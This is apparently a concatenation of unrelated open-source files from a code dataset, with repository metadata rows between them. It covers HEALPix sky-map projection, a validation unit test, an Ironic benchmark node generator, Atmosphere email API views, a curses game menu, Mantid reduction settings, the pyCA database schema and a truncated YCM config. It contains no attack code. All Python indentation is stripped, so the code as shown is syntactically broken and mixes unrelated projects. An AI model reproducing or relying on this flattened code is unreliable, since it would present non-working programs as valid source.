def project_and_write_maps(mode, propertiesweightsoperations, tbdata, catalogue_name, outrootdir, sample_names, inds, nside, ratiores, pixoffset, nsidesout=None):
resol_prefix = 'nside'+str(nside)+'_oversamp'+str(ratiores)
outroot = outrootdir + '/' + catalogue_name + '/' + resol_prefix + '/'
mkdir_p(outroot)
if mode == 1: # Fully sequential
for sample_name, ind in zip(sample_names, inds):
#print len(tbdata[ind]['ra1'])
#plt.plot(tbdata[ind]['ra1'],tbdata[ind]['dec1'],'k,')
#plt.show()
treemap = makeHealTree( (catalogue_name+'_'+sample_name, nside, ratiores, pixoffset, np.array(tbdata[ind])) )
for property, weights, operation in propertiesweightsoperations:
cutmap_indices, cutmap_signal = makeHpxMap_partial( (treemap, property, weights, operation) )
if nsidesout is None:
fname = outroot + '_'.join([catalogue_name, sample_name, resol_prefix, property, weights, operation]) + '.fits'
print( 'Creating and writing', fname)
write_partial_map(fname, cutmap_indices, cutmap_signal, nside, nest=False)
else:
cutmap_indices_nest = hp.ring2nest(nside, cutmap_indices)
outmap_hi = np.zeros(hp.nside2npix(nside))
outmap_hi.fill(0.0) #outmap_hi.fill(hp.UNSEEN)
outmap_hi[cutmap_indices_nest] = cutmap_signal
for nside_out in nsidesout:
if nside_out == nside:
outmap_lo = outmap_hi
else:
outmap_lo = hp.ud_grade(outmap_hi, nside_out, order_in='NESTED', order_out='NESTED')
resol_prefix2 = 'nside'+str(nside_out)+'from'+str(nside)+'o'+str(ratiores)
outroot2 = outrootdir + '/' + catalogue_name + '/' + resol_prefix2 + '/'
mkdir_p(outroot2)
fname = outroot2 + '_'.join([catalogue_name, sample_name, resol_prefix2, property, weights, operation]) + '.fits'
print( 'Writing', fname)
hp.write_map(fname, outmap_lo, nest=True)
subprocess.call("gzip -f "+fname,shell=True)
if mode == 3: # Fully parallel
pool = Pool(len(inds))
print( 'Creating HealTrees')
treemaps = pool.map( makeHealTree,
[ (catalogue_name+'_'+samplename, nside, ratiores, pixoffset, np.array(tbdata[ind]))
for samplename, ind in zip(sample_names, inds) ] )
for property, weights, operation in propertiesweightsoperations:
print( 'Making maps for', property, weights, operation)
outmaps = pool.map( makeHpxMap_partial,
[ (treemap, property, weights, operation) for treemap in treemaps ] )
for sample_name, outmap in zip(sample_names, outmaps):
fname = outroot + '_'.join([catalogue_name, sample_name, resol_prefix, property, weights, operation]) + '.fits'
print( 'Writing', fname)
cutmap_indices, cutmap_signal = outmap
write_partial_map(fname, cutmap_indices, cutmap_signal, nside, nest=False)
if mode == 2: # Parallel tree making and sequential writing
pool = Pool(len(inds))
print( 'Creating HealTrees')
treemaps = pool.map( makeHealTree,
[ (catalogue_name+'_'+samplename, nside, ratiores, pixoffset, np.array(tbdata[ind]))
for samplename, ind in zip(sample_names, inds) ] )
for property, weights, operation in propertiesweightsoperations:
for sample_name, treemap in zip(sample_names, treemaps):
fname = outroot + '_'.join([catalogue_name, sample_name, resol_prefix, property, weights, operation]) + '.fits'
print('Writing', fname)
#outmap = makeHpxMap( (treemap, property, weights, operation) )
#hp.write_map(fname, outmap, nest=False)
cutmap_indices, cutmap_signal = makeHpxMap_partial( (treemap, property, weights, operation) )
write_partial_map(fname, cutmap_indices, cutmap_signal, nside, nest=False)
def project_and_write_maps_simp(mode, propertiesweightsoperations, tbdata, catalogue_name, outrootdir, sample_names, inds, nside):
#hack by AJR and MarcM
#nwrong = 0 #number of wrong projected pixels
resol_prefix = 'nside'+str(nside)+'_oversamp1'
outroot = outrootdir + '/' + catalogue_name + '/' + resol_prefix + '/'
mkdir_p(outroot)
for sample_name, ind in zip(sample_names, inds):
treemap = makeHealTree_simp( (catalogue_name+'_'+sample_name, nside, np.array(tbdata[ind])) )
for property, weights, operation in propertiesweightsoperations:
cutmap_indices, cutmap_signal = makeHpxMap_partial( (treemap, property, weights, operation) )
fname = outroot + '_'.join([catalogue_name, sample_name, resol_prefix, property, weights, operation]) + '.fits'
print('Creating and writing', fname)
write_partial_map(fname, cutmap_indices, cutmap_signal, nside, nest=False)
#print "number of wrong projected ccd-pointings is: ", nwrong
# ---------------------------------------------------------------------------------------- #
def test():
fname = '/Users/bl/Dropbox/Projects/Quicksip/data/SVA1_COADD_ASTROM_PSF_INFO.fits'
#fname = '/Users/bl/Dropbox/Projects/Quicksip/data/Y1A1_IMAGEINFO_and_COADDINFO.fits'
pixoffset = 10
hdulist = pyfits.open(fname)
tbdata = hdulist[1].data
hdulist.close()
nside = 1024
ratiores = 4
treemap = HealTree(nside)
#results = pool.map(treemap.addElem, [imagedata for imagedata in tbdata])
print( tbdata.dtype)
#ind = np.ndarray([0])
ind = np.where( tbdata['band'] == 'i' )
import numpy.random
ind = numpy.random.choice(ind[0], 1 )
print( 'Number of images :', len(ind))
hpxmap = np.zeros(hp.nside2npix(nside))
ras_c = []
decs_c = []
for i, propertyArray in enumerate(tbdata[ind]):
ras_c.append(propertyArray['RA'])
decs_c.append(propertyArray['DEC'])
plt.figure()
for i, propertyArray in enumerate(tbdata[ind]):
print(i)
propertyArray.dtype = tbdata.dtype
listpix, weights, thetas_c, phis_c, listpix_sup = computeHPXpix_sequ_new(nside, propertyArray, pixoffset=pixoffset, ratiores=ratiores)
#listpix2, weights2, thetas_c2, phis_c2 = computeHPXpix_sequ(nside, propertyArray, pixoffset=pixoffset, ratiores=ratiores)
hpxmap = np.zeros(hp.nside2npix(nside))
hpxmap[listpix] = weights
hpxmap_sup = np.zeros(hp.nside2npix(ratiores*nside))
hpxmap_sup[listpix_sup] = 1.0
listpix_hi, weights_hi, thetas_c_hi, phis_c_hi, superind_hi = computeHPXpix_sequ_new(ratiores*nside, propertyArray, pixoffset=pixoffset, ratiores=1)
hpxmap_hi = np.zeros(hp.nside2npix(ratiores*nside))
hpxmap_hi[listpix_hi] = weights_hi
hpxmap_hitolo = hp.ud_grade(hpxmap_hi, nside)
print('valid hpxmap_hi', np.where(hpxmap_hi > 0)[0])
print('hpxmap', zip(np.where(hpxmap > 0)[0], hpxmap[hpxmap > 0]))
print('hpxmap_sup', zip(np.where(hpxmap_sup > 0)[0], hpxmap_sup[hpxmap_sup > 0]))
print('hpxmap_hitolo', zip(np.where(hpxmap_hitolo > 0)[0], hpxmap_hitolo[hpxmap_hitolo > 0]))
hp.gnomview(hpxmap_hi, title='hpxmap_hi', rot=[propertyArray['RA'], propertyArray['DEC']], reso=0.2)
hp.gnomview(hpxmap_sup, title='hpxmap_sup', rot=[propertyArray['RA'], propertyArray['DEC']], reso=0.2)
hp.gnomview(hpxmap_hitolo, title='hpxmap_hitolo', rot=[propertyArray['RA'], propertyArray['DEC']], reso=0.2)
hp.gnomview(hpxmap, title='hpxmap', rot=[propertyArray['RA'], propertyArray['DEC']], reso=0.2)
#plt.plot(phis_c, thetas_c)
thetas, phis = hp.pix2ang(nside, listpix)
#plt.scatter(phis, thetas, color='red', marker='o', s=50*weights)
#plt.scatter(propertyArray['RA']*np.pi/180, np.pi/2 - propertyArray['DEC']*np.pi/180)
#plt.text(propertyArray['RA']*np.pi/180, np.pi/2 - propertyArray['DEC']*np.pi/180, str(i))
plt.show()
stop
#if __name__ == "__main__":
# test()
| gpl-2.0 | -6,887,529,562,619,616,000 | 42.075105 | 223 | 0.562613 | false |
chambers-brian/SIG_Digital-Strategy_SI_ODP_Backend | tests/unit/dataactvalidator/test_b7_object_class_program_activity_2.py | 1 | 1566 | from tests.unit.dataactcore.factories.staging import ObjectClassProgramActivityFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'b7_object_class_program_activity_2'
def test_column_headers(database):
expected_subset = {'row_number', 'gross_outlays_delivered_or_cpe', 'ussgl490200_delivered_orde_cpe',
'ussgl490800_authority_outl_cpe', 'ussgl498200_upward_adjustm_cpe'}
actual = set(query_columns(_FILE, database))
assert (actual & expected_subset) == expected_subset
def test_success(database):
""" Test Object Class Program Activity gross_outlays_delivered_or_cpe equals ussgl490200_delivered_orde_cpe +
ussgl490800_authority_outl_cpe + ussgl498200_upward_adjustm_cpe """
op = ObjectClassProgramActivityFactory(gross_outlays_delivered_or_cpe=3, ussgl490200_delivered_orde_cpe=1,
ussgl490800_authority_outl_cpe=1, ussgl498200_upward_adjustm_cpe=1)
assert number_of_errors(_FILE, database, models=[op]) == 0
def test_failure(database):
""" Test Object Class Program Activity gross_outlays_delivered_or_cpe doesn't equals ussgl490200_delivered_orde_cpe +
ussgl490800_authority_outl_cpe + ussgl498200_upward_adjustm_cpe """
op = ObjectClassProgramActivityFactory(gross_outlays_delivered_or_cpe=1, ussgl490200_delivered_orde_cpe=1,
ussgl490800_authority_outl_cpe=1, ussgl498200_upward_adjustm_cpe=1)
assert number_of_errors(_FILE, database, models=[op]) == 1
| cc0-1.0 | -5,720,147,414,092,024,000 | 46.454545 | 121 | 0.714559 | false |
openstack/ironic | tools/benchmark/do_not_run_create_benchmark_data.py | 1 | 4622 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
import time
from oslo_db.sqlalchemy import enginefacade
from sqlalchemy import sql
from ironic.common import service
from ironic.conf import CONF # noqa To Load Configuration
from ironic.objects import node
def _create_test_nodes():
print("Starting creation of fake nodes.")
start = time.time()
node_count = 10000
checkin = time.time()
for i in range(0, node_count):
new_node = node.Node({
'power_state': 'power off',
'driver': 'ipmi',
'driver_internal_info': {'test-meow': i},
'name': 'BenchmarkTestNode-%s' % i,
'driver_info': {
'ipmi_username': 'admin',
'ipmi_password': 'admin',
'ipmi_address': 'testhost%s.env.top.level.domain' % i},
'resource_class': 'CUSTOM_BAREMETAL',
'properties': {
'cpu': 4,
'memory': 32,
'cats': i,
'meowing': True}})
new_node.create()
delta = time.time() - checkin
if delta > 10:
checkin = time.time()
print('* At %s nodes, %0.02f seconds. Total elapsed: %s'
% (i, delta, time.time() - start))
created = time.time()
elapse = created - start
print('Created %s nodes in %s seconds.\n' % (node_count, elapse))
def _mix_up_nodes_data():
engine = enginefacade.writer.get_engine()
conn = engine.connect()
# A list of commands to mix up indexed field data a bit to emulate what
# a production database may somewhat look like.
commands = [
"UPDATE nodes set maintenance = True where RAND() < 0.1", # noqa Easier to read this way
"UPDATE nodes set driver = 'redfish' where RAND() < 0.5", # noqa Easier to read this way
"UPDATE nodes set reservation = 'fake_conductor01' where RAND() < 0.02", # noqa Easier to read this way
"UPDATE nodes set reservation = 'fake_conductor02' where RAND() < 0.02", # noqa Easier to read this way
"UPDATE nodes set reservation = 'fake_conductor03' where RAND() < 0.02", # noqa Easier to read this way
"UPDATE nodes set reservation = 'fake_conductor04' where RAND() < 0.02", # noqa Easier to read this way
"UPDATE nodes set reservation = 'fake_conductor05' where RAND() < 0.02", # noqa Easier to read this way
"UPDATE nodes set reservation = 'fake_conductor06' where RAND() < 0.02", # noqa Easier to read this way
"UPDATE nodes set provision_state = 'active' where RAND() < 0.8", # noqa Easier to read this way
"UPDATE nodes set power_state = 'power on' where provision_state = 'active' and RAND() < 0.95", # noqa Easier to read this way
"UPDATE nodes set provision_state = 'available' where RAND() < 0.1", # noqa Easier to read this way
"UPDATE nodes set provision_state = 'manageable' where RAND() < 0.1", # noqa Easier to read this way
"UPDATE nodes set provision_state = 'clean wait' where RAND() < 0.05", # noqa Easier to read this way
"UPDATE nodes set provision_state = 'error' where RAND() < 0.05", # noqa Easier to read this way
"UPDATE nodes set owner = (select UUID()) where RAND() < 0.2", # noqa Easier to read this way
"UPDATE nodes set lessee = (select UUID()) where RAND() < 0.2", # noqa Easier to read this way
"UPDATE nodes set instance_uuid = (select UUID()) where RAND() < 0.95 and provision_state = 'active'", # noqa Easier to read this way
"UPDATE nodes set last_error = (select UUID()) where RAND() <0.05", # noqa Easier to read this way
]
start = time.time()
for command in commands:
print("Executing SQL command: \\" + command + ";\n")
conn.execute(sql.text(command))
print("* Completed command. %0.04f elapsed since start of commands."
% (time.time() - start))
def main():
service.prepare_service()
CONF.set_override('debug', False)
_create_test_nodes()
if __name__ == '__main__':
sys.exit(main())
| apache-2.0 | -364,045,721,960,664,100 | 45.686869 | 142 | 0.618347 | false |
CCI-MOC/GUI-Backend | api/v1/views/email.py | 1 | 4618 | """
Atmosphere api email
"""
from rest_framework.response import Response
from rest_framework import status
from django.template.loader import render_to_string
from django.template import Context
from threepio import logger
from django_cyverse_auth.protocol.ldap import lookupEmail
from core.models import AtmosphereUser as User
from core.email import email_admin, resource_request_email
from api import failure_response
from api.v1.views.base import AuthAPIView
class Feedback(AuthAPIView):
"""
Post feedback via RESTful API
"""
def post(self, request):
"""
Creates a new feedback email and sends it to admins.
"""
required = ["message", "user-interface"]
missing_keys = check_missing_keys(request.data, required)
if missing_keys:
return keys_not_found(missing_keys)
result = self._email(request,
request.user.username,
lookupEmail(request.user.username),
request.data["message"])
return Response(result, status=status.HTTP_201_CREATED)
def _email(self, request, username, user_email, message):
"""
Sends an email to support based on feedback from a client machine
Returns a response.
"""
user = User.objects.get(username=username)
subject = 'Subject: Atmosphere Client Feedback from %s' % username
context = {
"user": user,
"feedback": message
}
body = render_to_string("core/email/feedback.html",
context=Context(context))
email_success = email_admin(request, subject, body, request_tracker=True)
if email_success:
resp = {'result':
{'code': 'success',
'meta': '',
'value': (
'Thank you for your feedback! '
'Support has been notified.')}}
else:
resp = {'result':
{'code': 'failed',
'meta': '',
'value': 'Failed to send feedback!'}}
return resp
class QuotaEmail(AuthAPIView):
"""
Post Quota Email via RESTful API.
"""
def post(self, request):
"""
Creates a new Quota Request email and sends it to admins.
"""
required = ["quota", "reason"]
missing_keys = check_missing_keys(request.data, required)
if missing_keys:
return keys_not_found(missing_keys)
logger.debug("request.data = %s" % (str(request.data)))
result = self._email(request,
request.user.username,
request.data["quota"],
request.data["reason"])
return Response(result, status=status.HTTP_201_CREATED)
def _email(self, request, username, new_resource, reason):
"""
Processes resource request increases. Sends email to the admins
Returns a response.
"""
return resource_request_email(request, username, new_resource, reason)
class SupportEmail(AuthAPIView):
def post(self, request):
"""
Creates a new support email and sends it to admins.
Post Support Email via RESTful API
"""
required = ["message", "subject", "user-interface"]
missing_keys = check_missing_keys(request.data, required)
if missing_keys:
return keys_not_found(missing_keys)
result = self._email(request,
request.data["subject"],
request.data["message"])
return Response(result, status=status.HTTP_201_CREATED)
def _email(self, request, subject, message):
"""
Sends an email to support.
POST Params expected:
* user
* message
* subject
Returns a response.
"""
email_success = email_admin(request, subject, message, request_tracker=True)
return {"email_sent": email_success}
def check_missing_keys(data, required_keys):
"""
Return any missing required post key names.
"""
return [key for key in required_keys
# Key must exist and have a non-empty value.
if key not in data or
(isinstance(data[key], str) and len(data[key]) > 0)]
def keys_not_found(missing_keys):
return failure_response(
status.HTTP_400_BAD_REQUEST,
"Missing required POST data variables : %s" % missing_keys)
| apache-2.0 | 1,517,545,801,638,144,800 | 30.848276 | 84 | 0.569944 | false |
neo1691/scorer.py | scorer/ui.py | 1 | 1402 | from curses import wrapper
import curses
import logging
logger = logging.getLogger('scorer.ui')
def printGames(stdscr, matches, selected):
stdscr.clear()
stdscr.addstr(0, 0, "The Following games \
are available Right now\n", curses.color_pair(1))
for index, game in enumerate(matches):
if index != selected:
stdscr.addstr(index+1, 10, game, curses.color_pair(0))
else:
stdscr.addstr(index+1, 10, game, curses.color_pair(2))
stdscr.refresh()
def main(stdscr, matches):
curses.curs_set(False)
selected = 0
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLACK)
while True:
printGames(stdscr, matches, selected)
event = stdscr.getch()
if event == ord("\n"):
logging.info("Enter key pressed")
return selected
elif event == curses.KEY_UP:
logging.info("Up key pressed")
if selected != 0:
selected -= 1
printGames(stdscr, matches, selected)
elif event == curses.KEY_DOWN:
logging.info("Down key pressed")
if selected != len(matches) - 1:
selected += 1
printGames(stdscr, matches, selected)
def getUserInput(matches):
selected = wrapper(main, matches)
return selected
| gpl-2.0 | 5,232,536,504,837,891,000 | 30.155556 | 66 | 0.601284 | false |
dymkowsk/mantid | scripts/Interface/reduction_gui/reduction/inelastic/dgs_sample_data_setup_script.py | 1 | 12591 | #pylint: disable=invalid-name
"""
Classes for each reduction step. Those are kept separately
from the the interface class so that the DgsReduction class could
be used independently of the interface implementation
"""
from __future__ import (absolute_import, division, print_function)
import os
import xml.dom.minidom
from reduction_gui.reduction.scripter import BaseScriptElement
class SampleSetupScript(BaseScriptElement):
sample_file = ""
live_button = False
output_wsname = ""
detcal_file = ""
relocate_dets = False
incident_energy_guess = ""
use_ei_guess = False
tzero_guess = 0.0
monitor1_specid = ""
monitor2_specid = ""
rebin_et = False
et_range_low = ""
et_range_width = ""
et_range_high = ""
et_is_distribution = True
hardmask_file = ""
grouping_file = ""
show_workspaces = False
savedir = ""
def __init__(self, inst_name):
super(SampleSetupScript, self).__init__()
self.set_default_pars(inst_name)
self.reset()
def set_default_pars(self, inst_name):
from Interface.reduction_gui.reduction.inelastic import dgs_utils
ip = dgs_utils.InstrumentParameters(inst_name)
SampleSetupScript.monitor1_specid = str(int(ip.get_parameter("ei-mon1-spec")))
SampleSetupScript.monitor2_specid = str(int(ip.get_parameter("ei-mon2-spec")))
def to_script(self):
script = ""
if not self.live_button:
script += "SampleInputFile=\"%s\",\n" % self.sample_file
else:
script += "SampleInputWorkspace=input,\n"
tmp_wsname = ""
if self.output_wsname == SampleSetupScript.output_wsname:
# Make a default name from the incoming file
tmp = os.path.split(os.path.splitext(str(self.sample_file))[0])[-1]
tmp_wsname = tmp + "_spe"
else:
tmp_wsname = self.output_wsname
script += "OutputWorkspace=\"%s\",\n" % tmp_wsname
if self.detcal_file != SampleSetupScript.detcal_file:
script += "DetCalFilename=\"%s\",\n" % self.detcal_file
if self.relocate_dets != SampleSetupScript.relocate_dets:
script += "RelocateDetectors=%s,\n" % self.relocate_dets
if self.incident_energy_guess != SampleSetupScript.incident_energy_guess:
script += "IncidentEnergyGuess=%s,\n" % float(self.incident_energy_guess)
if self.use_ei_guess != SampleSetupScript.use_ei_guess:
script += "UseIncidentEnergyGuess=%s,\n" % self.use_ei_guess
if self.tzero_guess != SampleSetupScript.tzero_guess:
script += "TimeZeroGuess=%s,\n" % str(self.tzero_guess)
if self.monitor1_specid != SampleSetupScript.monitor1_specid:
try:
temp1 = int(self.monitor1_specid)
script += "Monitor1SpecId=%s,\n" % temp1
except ValueError:
pass
if self.monitor2_specid != SampleSetupScript.monitor2_specid:
try:
temp2 = int(self.monitor2_specid)
script += "Monitor2SpecId=%s,\n" % temp2
except ValueError:
pass
if self.et_range_low != SampleSetupScript.et_range_low or \
self.et_range_width != SampleSetupScript.et_range_width or \
self.et_range_high != SampleSetupScript.et_range_high:
script += "EnergyTransferRange=\"%s,%s,%s\",\n" % (self.et_range_low,
self.et_range_width,
self.et_range_high)
if self.et_is_distribution != SampleSetupScript.et_is_distribution:
script += "SofPhiEIsDistribution=%s,\n" % self.et_is_distribution
if self.hardmask_file != SampleSetupScript.hardmask_file:
script += "HardMaskFile=\"%s\",\n" % self.hardmask_file
if self.grouping_file != SampleSetupScript.grouping_file:
script += "GroupingFile=\"%s\",\n" % self.grouping_file
if self.show_workspaces:
script += "ShowIntermediateWorkspaces=%s,\n" % self.show_workspaces
if self.savedir != SampleSetupScript.savedir:
script += "OutputDirectory=\"%s\",\n" % self.savedir
return script
def to_xml(self):
"""
Create XML from the current data.
"""
xml_str = "<SampleSetup>\n"
xml_str += " <sample_input_file>%s</sample_input_file>\n" % self.sample_file
xml_str += " <live_button>%s</live_button>\n" % self.live_button
xml_str += " <output_wsname>%s</output_wsname>\n" % self.output_wsname
xml_str += " <detcal_file>%s</detcal_file>\n" % self.detcal_file
xml_str += " <relocate_dets>%s</relocate_dets>\n" % self.relocate_dets
xml_str += " <incident_energy_guess>%s</incident_energy_guess>\n" % self.incident_energy_guess
xml_str += " <use_ei_guess>%s</use_ei_guess>\n" % str(self.use_ei_guess)
xml_str += " <tzero_guess>%s</tzero_guess>\n" % str(self.tzero_guess)
xml_str += " <monitor1_specid>%s</monitor1_specid>\n" % self.monitor1_specid
xml_str += " <monitor2_specid>%s</monitor2_specid>\n" % self.monitor2_specid
xml_str += " <et_range>\n"
xml_str += " <low>%s</low>\n" % self.et_range_low
xml_str += " <width>%s</width>\n" % self.et_range_width
xml_str += " <high>%s</high>\n" % self.et_range_high
xml_str += " </et_range>\n"
xml_str += " <sofphie_is_distribution>%s</sofphie_is_distribution>\n" % str(self.et_is_distribution)
xml_str += " <hardmask_file>%s</hardmask_file>\n" % self.hardmask_file
xml_str += " <grouping_file>%s</grouping_file>\n" % self.grouping_file
xml_str += " <show_workspaces>%s</show_workspaces>\n" % self.show_workspaces
xml_str += " <savedir>%s</savedir>\n" % self.savedir
xml_str += "</SampleSetup>\n"
return xml_str
def from_xml(self, xml_str):
"""
Read in data from XML
@param xml_str: text to read the data from
"""
dom = xml.dom.minidom.parseString(xml_str)
element_list = dom.getElementsByTagName("SampleSetup")
if len(element_list) > 0:
instrument_dom = element_list[0]
self.sample_file = BaseScriptElement.getStringElement(instrument_dom,
"sample_input_file",
default=SampleSetupScript.sample_file)
self.live_button = BaseScriptElement.getBoolElement(instrument_dom,
"live_button",
default=SampleSetupScript.live_button)
self.output_wsname = BaseScriptElement.getStringElement(instrument_dom,
"output_wsname",
default=SampleSetupScript.output_wsname)
self.detcal_file = BaseScriptElement.getStringElement(instrument_dom,
"detcal_file",
default=SampleSetupScript.detcal_file)
self.relocate_dets = BaseScriptElement.getBoolElement(instrument_dom,
"relocate_dets",
default=SampleSetupScript.relocate_dets)
self.incident_energy_guess = BaseScriptElement.getStringElement(instrument_dom,
"incident_energy_guess",
default=SampleSetupScript.incident_energy_guess)
self.use_ei_guess = BaseScriptElement.getBoolElement(instrument_dom,
"use_ei_guess",
default=SampleSetupScript.use_ei_guess)
self.tzero_guess = BaseScriptElement.getFloatElement(instrument_dom,
"tzero_guess",
default=SampleSetupScript.tzero_guess)
self.monitor1_specid = BaseScriptElement.getStringElement(instrument_dom,
"monitor1_specid",
default=SampleSetupScript.monitor1_specid)
self.monitor2_specid = BaseScriptElement.getStringElement(instrument_dom,
"monitor2_specid",
default=SampleSetupScript.monitor2_specid)
self.et_range_low = BaseScriptElement.getStringElement(instrument_dom,
"et_range/low",
default=SampleSetupScript.et_range_low)
self.et_range_width = BaseScriptElement.getStringElement(instrument_dom,
"et_range/width",
default=SampleSetupScript.et_range_width)
self.et_range_high = BaseScriptElement.getStringElement(instrument_dom,
"et_range/high",
default=SampleSetupScript.et_range_high)
self.et_is_distribution = BaseScriptElement.getBoolElement(instrument_dom,
"sofphie_is_distribution",
default=SampleSetupScript.et_is_distribution)
self.hardmask_file = BaseScriptElement.getStringElement(instrument_dom,
"hardmask_file",
default=SampleSetupScript.hardmask_file)
self.grouping_file = BaseScriptElement.getStringElement(instrument_dom,
"grouping_file",
default=SampleSetupScript.grouping_file)
self.show_workspaces = BaseScriptElement.getBoolElement(instrument_dom,
"show_workspaces",
default=SampleSetupScript.show_workspaces)
self.savedir = BaseScriptElement.getStringElement(instrument_dom,
"savedir",
default=SampleSetupScript.savedir)
def reset(self):
"""
Reset state
"""
self.sample_file = SampleSetupScript.sample_file
self.live_button = SampleSetupScript.live_button
self.output_wsname = SampleSetupScript.output_wsname
self.detcal_file = SampleSetupScript.detcal_file
self.relocate_dets = SampleSetupScript.relocate_dets
self.incident_energy_guess = SampleSetupScript.incident_energy_guess
self.use_ei_guess = SampleSetupScript.use_ei_guess
self.tzero_guess = SampleSetupScript.tzero_guess
self.monitor1_specid = SampleSetupScript.monitor1_specid
self.monitor2_specid = SampleSetupScript.monitor2_specid
self.rebin_et = SampleSetupScript.rebin_et
self.et_range_low = SampleSetupScript.et_range_low
self.et_range_width = SampleSetupScript.et_range_width
self.et_range_high = SampleSetupScript.et_range_high
self.et_is_distribution = SampleSetupScript.et_is_distribution
self.hardmask_file = SampleSetupScript.hardmask_file
self.grouping_file = SampleSetupScript.grouping_file
self.show_workspaces = SampleSetupScript.show_workspaces
self.savedir = SampleSetupScript.savedir
| gpl-3.0 | 7,636,383,482,298,824,000 | 57.562791 | 124 | 0.52339 | false |
opencast/pyCA | pyca/db.py | 1 | 6175 | # -*- coding: utf-8 -*-
'''
pyca.db
~~~~¨~~
Database specification for pyCA
'''
import json
import os.path
import string
from pyca.config import config
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, Text, LargeBinary, DateTime, \
create_engine
from sqlalchemy.orm import sessionmaker
from datetime import datetime
from functools import wraps
Base = declarative_base()
def init():
'''Initialize connection to database. Additionally the basic database
structure will be created if nonexistent.
'''
global engine
engine = create_engine(config('agent', 'database'))
Base.metadata.create_all(engine)
def get_session():
'''Get a session for database communication. If necessary a new connection
to the database will be established.
:return: Database session
'''
if 'engine' not in globals():
init()
Session = sessionmaker(bind=engine)
return Session()
def with_session(f):
"""Wrapper for f to make a SQLAlchemy session present within the function
:param f: Function to call
:type f: Function
:raises e: Possible exception of f
:return: Result of f
"""
@wraps(f)
def decorated(*args, **kwargs):
session = get_session()
try:
result = f(session, *args, **kwargs)
except Exception as e:
session.rollback()
raise e
finally:
session.close()
return result
return decorated
class Constants():
@classmethod
def str(cls, value):
'''Convert status (id) to its string name.'''
for k, v in cls.__dict__.items():
if k[0] in string.ascii_uppercase and v == value:
return k.lower().replace('_', ' ')
class Status(Constants):
'''Event status definitions
'''
UPCOMING = 1
RECORDING = 2
FAILED_RECORDING = 3
FINISHED_RECORDING = 4
UPLOADING = 5
FAILED_UPLOADING = 6
FINISHED_UPLOADING = 7
PARTIAL_RECORDING = 8
PAUSED_AFTER_RECORDING = 9
class ServiceStatus(Constants):
'''Service status type definitions
'''
STOPPED = 1
IDLE = 2
BUSY = 3
class Service(Constants):
'''Service type definitions
'''
AGENTSTATE = 1
CAPTURE = 2
INGEST = 3
SCHEDULE = 4
# Database Schema Definition
class BaseEvent():
'''Database definition of an event.'''
__tablename__ = 'event'
uid = Column('uid', Text(), nullable=False, primary_key=True)
start = Column('start', Integer(), primary_key=True)
end = Column('end', Integer(), nullable=False)
title = Column('title', Text())
data = Column('data', LargeBinary(), nullable=False)
status = Column('status', Integer(), nullable=False,
default=Status.UPCOMING)
tracks = Column('tracks', LargeBinary(), nullable=True)
def get_data(self):
'''Load JSON data from event.
'''
return json.loads(self.data.decode('utf-8'))
def set_data(self, data):
'''Store data as JSON.
'''
# Python 3 wants bytes
self.data = json.dumps(data).encode('utf-8')
def name(self):
'''Returns the filesystem name of this event.
'''
return 'recording-%i-%s' % (self.start, self.uid)
def directory(self):
'''Returns recording directory of this event.
'''
return os.path.join(config('capture', 'directory'), self.name())
def remaining_duration(self, time):
'''Returns the remaining duration for a recording.
'''
return max(0, self.end - max(self.start, time))
def status_str(self):
'''Return status as string.
'''
return Status.str(self.status)
def get_tracks(self):
'''Load JSON track data from event.
'''
if not self.tracks:
return []
return json.loads(self.tracks.decode('utf-8'))
def set_tracks(self, tracks):
'''Store track data as JSON.
'''
self.tracks = json.dumps(tracks).encode('utf-8')
def __repr__(self):
'''Return a string representation of an artist object.
:return: String representation of object.
'''
return '<Event(start=%i, uid="%s")>' % (self.start, self.uid)
def serialize(self):
'''Serialize this object as dictionary usable for conversion to JSON.
:return: Dictionary representing this object.
'''
return {
'type': 'event',
'id': self.uid,
'attributes': {
'start': self.start,
'end': self.end,
'uid': self.uid,
'title': self.title,
'data': self.get_data(),
'status': Status.str(self.status)
}
}
class UpcomingEvent(Base, BaseEvent):
'''List of upcoming events'''
__tablename__ = 'upcoming_event'
class RecordedEvent(Base, BaseEvent):
'''List of events pyca tried to record.'''
__tablename__ = 'recorded_event'
def __init__(self, event=None):
if event:
self.uid = event.uid
self.start = event.start
self.end = event.end
self.title = event.title
self.data = event.data
self.status = event.status
class ServiceStates(Base):
'''List of internal service states.'''
__tablename__ = 'service_states'
type = Column('type', Integer(), nullable=False, primary_key=True)
status = Column('status', Integer(), nullable=False,
default=ServiceStatus.STOPPED)
def __init__(self, service=None):
if service:
self.type = service.type
self.status = service.status
class UpstreamState(Base):
'''State of the upstream Opencast server.'''
__tablename__ = 'upstream_state'
url = Column('url', Text(), primary_key=True)
last_synced = Column('last_synced', DateTime())
@staticmethod
def update_sync_time(url):
s = get_session()
s.merge(UpstreamState(url=url, last_synced=datetime.utcnow()))
s.commit()
s.close()
| lgpl-3.0 | 1,113,225,229,775,429,800 | 25.050633 | 78 | 0.587302 | false |
vhb/dotfiles | vim/ycm_extra_conf.py | 1 | 2505 | import os
import ycm_core
from clang_helpers import PrepareClangFlags
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
# These are the compilation flags that will be used in case there's no
# compilation database set.
flags = [
'-Wall',
'-W',
'-Wextra',
'-std=c++11',
'-stdlib=libc++',
'-x',
'c++',
'-I',
'.',
'-I',
'/usr/include/c++/4.2.1/'
]
if compilation_database_folder:
database = ycm_core.CompilationDatabase(compilation_database_folder)
else:
database = None
def DirectoryOfThisScript():
return os.path.dirname(os.path.abspath(__file__))
def MakeRelativePathsInFlagsAbsolute(flags, working_directory):
if not working_directory:
return flags
new_flags = []
make_next_absolute = False
path_flags = ['-isystem', '-I', '-iquote', '--sysroot=']
